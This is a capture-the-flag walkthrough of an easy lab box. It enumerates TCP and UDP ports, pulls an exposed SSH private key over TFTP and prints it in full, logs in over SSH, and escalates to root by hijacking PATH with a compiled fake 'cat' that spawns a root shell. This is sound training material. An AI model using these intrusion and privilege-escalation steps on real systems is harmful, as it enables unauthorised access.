Overview
Honestly, I learnt alot in this box about nmap UDP scans and the importance of having a proper enumeration technique.
| Box Difficulty | Link |
|---|---|
| Easy | hackmyvm Link |
Explanation behind nmap for UDP Scan.
It’s just unreliable and slow. Honestly a full port scan for UDP can take days. If you put parallelism or force it to make it fast, unreliable. Even a normal scan, unreliable. Example from nmap Chapter 5. Port Scanning Techniques and Algorithms for udp :
1
2
3
4
5
6
7
8
**Example 5.5. UDP scan example**
krad# **`nmap -sU -T4 scanme.nmap.org`**
Starting Nmap ( http://nmap.org )
All 1000 scanned ports on scanme.nmap.org (64.13.134.52) are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 5.50 seconds
In this case, the scan didn’t narrow down the open ports at all. All 1000 are open|filtered. A new strategy is called for.
Thus optimizing for UDP scans:
1
2
3
4
5
6
7
8
9
10
11
**Example 5.9. Optimizing UDP Scan Time**
krad# **`nmap -sUV -T4 -F --version-intensity 0 scanme.nmap.org`**
Starting Nmap ( http://nmap.org )
Nmap scan report for scanme.nmap.org (64.13.134.52)
Not shown: 99 open|filtered ports
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.3.4
Nmap done: 1 IP address (1 host up) scanned in 12.92 seconds
Explanation :
–> version-intensity 0 to version detection scans
| Vesion detection (-sV) is often needed to differentiate open from filtered UDP ports. Version detection is relatively slow since it involves sending a large number of application protocol-specific probes to every open or open | filtered port found on the target machines. Specifying –version-intensity 0 directs Nmap to try only the probes most likely to be effective against a given port number. |
–> Scan popular ports first using -F
Very few UDP port numbers are commonly used. A scan of the most common 100 UDP ports (using the -F option) will finish quickly. You can then investigate those results while you launch a multi-day 65K-port sweep of the network in the background.
–> -sUV
| When version scanning is enabled with -sV (or -A), it will send UDP probes to every open | filtered port (as well as known open ones). If any of the probes elicit a response from an open | filtered port, the state is changed to open |
Improve Recon
Moving forward this will be my go to recon steps pre nmap.
Step 1. Find all possible active ports using masscan.
1
2
3
4
5
6
7
8
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# masscan -p1-65535,U:1-65535 192.168.56.24 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-12-26 12:00:29 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 192.168.56.24
Discovered open port 21/tcp on 192.168.56.24
Discovered open port 80/tcp on 192.168.56.24
Step 2. Further enumerate all open|filtered UDP ports using NMAP to find false positive.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# nmap -sUV -T4 -F --version-intensity 0 192.168.56.24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 03:42 EST
Warning: 192.168.56.24 giving up on port because retransmission cap hit (6).
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 63.00% done; ETC: 03:43 (0:00:18 remaining)
Nmap scan report for 192.168.56.24
Host is up (0.00047s latency).
Not shown: 83 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
17/udp open|filtered tcpwrapped
19/udp open|filtered tcpwrapped
68/udp open|filtered tcpwrapped
69/udp open|filtered tftp
135/udp open|filtered tcpwrapped
138/udp open|filtered tcpwrapped
443/udp open|filtered https
445/udp open|filtered tcpwrapped
500/udp open|filtered isakmp
631/udp open|filtered tcpwrapped
1028/udp open|filtered tcpwrapped
3456/udp open|filtered tcpwrapped
5353/udp open|filtered zeroconf
31337/udp open|filtered BackOrifice
32815/udp open|filtered tcpwrapped
49193/udp open|filtered tcpwrapped
49194/udp open|filtered tcpwrapped
MAC Address: 08:00:27:19:C6:FA (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.64 seconds
With this we now have interesting targets such as port 21,22,80 for TCP.
And udp Port 69 which runs TFTP!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# nmap -sV -sC -p 21,22,80 192.168.56.24 -o nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 22:11 EST
Nmap scan report for 192.168.56.24
Host is up (0.00033s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c6:27:ab:53:ab:b9:c0:20:37:36:52:a9:60:d3:53:fc (RSA)
| 256 48:3b:28:1f:9a:23:da:71:f6:05:0b:a5:a6:c8:b7:b0 (ECDSA)
|_ 256 b3:2e:7c:ff:62:2d:53:dd:63:97:d4:47:72:c8:4e:30 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:19:C6:FA (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds
HTTP- TCP 80
Feroxbuster shows a index.html file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# feroxbuster --url http://192.168.56.24:80 -x txt,html,php,php.bak,bak,jsp -t 100 -d 1 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o feroxbuster_p80.txt && sort -k5 -o feroxbuster_p80.txt feroxbuster_p80.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.4.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.24:80
🚀 Threads │ 100
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.4.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💾 Output File │ feroxbuster_p80.txt
💲 Extensions │ [txt, html, php, php.bak, bak, jsp]
🔃 Recursion Depth │ 1
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 4l 14w 99c http://192.168.56.24/index.html
[####################] - 9m 8916726/8916726 0s found:1 errors:0
[####################] - 9m 8916726/8916726 16132/s http://192.168.56.24
Looks like we are finding alexia id_rsa keys to ssh into the server.
1
2
3
4
5
6
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# curl http://192.168.56.24/index.html
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobodya
FTP - TCP 21
Let’s download all the file on ftp onto local machine to see if there’s id_rsa.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# wget -m --no-passive ftp://anonymous:anonymous@192.168.56.24
--2021-12-25 23:09:43-- ftp://anonymous:*password*@192.168.56.24/
=> ‘192.168.56.24/.listing’
Connecting to 192.168.56.24:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> PORT ... done. ==> LIST ... done.
…
Look through all the files. http://192.168.56.24/index.html
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# ls -la
total 28
drwxr-xr-x 3 root root 4096 Dec 25 23:09 .
drwxr-xr-x 11 root root 4096 Dec 25 22:10 ..
drwxr-xr-x 3 root root 4096 Dec 25 23:09 192.168.56.24
┌──(root💀kali)-[/opt/hackmyv/hommie/192.168.56.24]
└─# ls -laR
.:
total 16
drwxr-xr-x 3 root root 4096 Dec 25 23:09 .
drwxr-xr-x 3 root root 4096 Dec 25 23:09 ..
-rw-r--r-- 1 root root 0 Sep 30 2020 index.html
-rw-r--r-- 1 root root 249 Dec 25 23:09 .listing
drwxr-xr-x 2 root root 4096 Dec 25 23:09 .web
./.web:
total 16
drwxr-xr-x 2 root root 4096 Dec 25 23:09 .
drwxr-xr-x 3 root root 4096 Dec 25 23:09 ..
-rw-r--r-- 1 root root 99 Sep 30 2020 index.html
-rw-r--r-- 1 root root 187 Dec 25 23:09 .listing
No luck
TFTP - UDP 69
Trivial file protocol uses UDP port 69 and requires no authentication—clients read from, and write to servers.
Let’s see if there is a id_rsa stored in the tftp server.
1
2
3
4
5
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# tftp 192.168.56.24
tftp> get id_rsa
Received 1850 bytes in 0.0 seconds
tftp> quit
Shell as alexia
Great, let’s double confirm it before we SSH as alexia.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# tftp 192.168.56.24
tftp> get id_rsa
Received 1850 bytes in 0.0 seconds
tftp> quit
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEApwUR2Pvdhsu1RGG0UIWmj2yDNvs+4VLPG0WWisip6oZrjMjJ40h7
V0zdgZSRFhMxx0/E6ilh2MiMbpAuogCqC3MEodzIzHYAJyK4z/lIqUNdHJbgLDyaY26G0y
Rn1XI+RqLi5NUHBPyiWEuQUEZCMOqi5lS1kaiNHmVqx+rlEs6ZUq7Z6lzYs7da3XcFGuOT
gCnBh1Wb4m4e14yF+Syn4wQVh1u/53XGmeB/ClcdAbSKoJswjI1JqCCkxudwRMUYjq309j
QMxa7bbxaJbkb3hLmMuFU7RGEPu7spLvzRwGAzCuU3f60qJVTp65pzFf3x51j3YAMI+ZBq
kyNE1y12swAAA8i6ZpNpumaTaQAAAAdzc2gtcnNhAAABAQCnBRHY+92Gy7VEYbRQhaaPbI
M2+z7hUs8bRZaKyKnqhmuMyMnjSHtXTN2BlJEWEzHHT8TqKWHYyIxukC6iAKoLcwSh3MjM
dgAnIrjP+UipQ10cluAsPJpjbobTJGfVcj5GouLk1QcE/KJYS5BQRkIw6qLmVLWRqI0eZW
rH6uUSzplSrtnqXNizt1rddwUa45OAKcGHVZvibh7XjIX5LKfjBBWHW7/ndcaZ4H8KVx0B
tIqgmzCMjUmoIKTG53BExRiOrfT2NAzFrttvFoluRveEuYy4VTtEYQ+7uyku/NHAYDMK5T
d/rSolVOnrmnMV/fHnWPdgAwj5kGqTI0TXLXazAAAAAwEAAQAAAQBhD7sthEFbAqtXEAi/
+suu8frXSu9h9sPRL4GrKa5FUtTRviZFZWv4cf0QPwyJ7aGyGJNxGZd5aiLiZfwTvZsUiE
Ua47n1yGWSWMVaZ55ob3N/F9czHg0C18qWjcOh8YBrgGGnZn1r0n1uHovBevMghlsgy/2w
pmlMTtfdUo7JfEKbZmsz3auih2/64rmVp3r0YyGrvOpWuV7spnzPNAFUCjPTwgE2RpBVtk
WeiQtF8IedoMqitUsJU9ephyYqvjRemEugkqkALBJt91yBBO6ilulD8Xv1RBsVHUttE/Jz
bu4XlJXVeD10ooFofrsZd/9Ydz4fx49GwtjYnqsda0rBAAAAgGbx1tdwaTPYdEfuK1kBhu
3ln3QHVx3ZkZ7tNQFxxEjYjIPUQcFFoNBQpIUNOhLCphB8agrhcke5+aq5z2nMdXUJ3DO6
0boB4mWSMml6aGpW4AfcDFTybT6V8pwZcThS9FL3K2JmlZbgPlhkX5fyOmh14/i5ti7r9z
HlBkwMfJJPAAAAgQDPt0ouxdkG1kDNhGbGuHSMAsPibivXEB7/wK7XHTwtQZ7cCQTVqbbs
y6FqG0oSaSz4m2DfWSRZc30351lU4ZEoHJmlL8Ul6yvCjMOnzUzkhrIen131h/MStsQYtY
OZgwwdcG2+N7MReMpbDA9FSHLtHoMLUcxShLSX3ccIoWxqAwAAAIEAzdgK1iwvZkOOtM08
QPaLXRINjIKwVdmOk3Q7vFhFRoman0JeyUbEd0qlcXjFzo02MBlBadh+XlsDUqZSWo7gpp
ivFRbnEu2sy02CHilIJ6vXCQnuaflapCNG8MlG5CtpqfyVoYQ3N3d0PfOWLaB13fGeV/wN
0x2HyroKtB+OeZEAAAANYWxleGlhQGhvbW1pZQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# chmod 600 id_rsa
┌──(root💀kali)-[/opt/hackmyv/hommie]
└─# ssh alexia@192.168.56.24 -i id_rsa
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 30 11:06:15 2020
alexia@hommie:~$ whoami;id;hostname
alexia
uid=1000(alexia) gid=1000(alexia) groups=1000(alexia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
hommie
Shell as Root
Download LINPEAS to help with priv esc.
1
2
3
4
5
6
7
alexia@hommie:~$ cd /tmp
alexia@hommie:/tmp$ wget http://192.168.56.3:1235/linpeas.sh
--2021-12-26 07:08:09-- http://192.168.56.3:1235/linpeas.sh
Connecting to 192.168.56.3:1235... connected.
HTTP request sent, awaiting response... 200 OK
Length: 330173 (322K) [text/x-sh]
Saving to: ‘linpeas.sh’
Running the scripts show a very interesting file -rwsr-sr-x 1 root root 17K Sep 30 2020 /opt/showMetheKey. Looks fishy.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 17K Sep 30 2020 /opt/showMetheKey
----------------------------------------------------------------------------------------
--- Trying to execute /opt/showMetheKey with strace in order to look for hijackable libraries...
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
wait4(12781, -----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
----------------------------------------------------------------------------------------
After running the file, it looks like it output the id_rsa of alexia ssh keys. Looking at the file using strings Command ,As you can see it really does read’s the current user ssh key : cat $HOME/.ssh/id_rsa
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
alexia@hommie:/tmp$ strings /opt/showMetheKey
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat $HOME/.ssh/id_rsa
This is a PATH Environment Variable exploit
If a script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the executed command in the script. Because cat command isn’t an absolute path, we can abuse this!
We can create a script which runs as cat that can make us root!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
alexia@hommie:/tmp$ cat cat.c
int main() {
setuid(0);
system("/bin/bash -p");
}
alexia@hommie:/tmp$ gcc -o cat cat.c
cat.c: In function ‘main’:
cat.c:2:1: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
setuid(0);
^~~~~~
cat.c:3:1: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
system("/bin/bash -p");
^~~~~~
1
2
alexia@hommie:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
Prepend the current directory (or where the new service executable is located) to the PATH variable, and execute the SUID file for a root shell:
1
2
3
4
5
6
7
8
alexia@hommie:/tmp$ PATH=.:$PATH /opt/showMetheKey
root@hommie:/tmp# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(alexia)
root@hommie:/root# cat note.txt
I dont remember where I stored root.txt !!!
root@hommie:/# find . -name root.txt
./usr/include/root.txt
And we are root!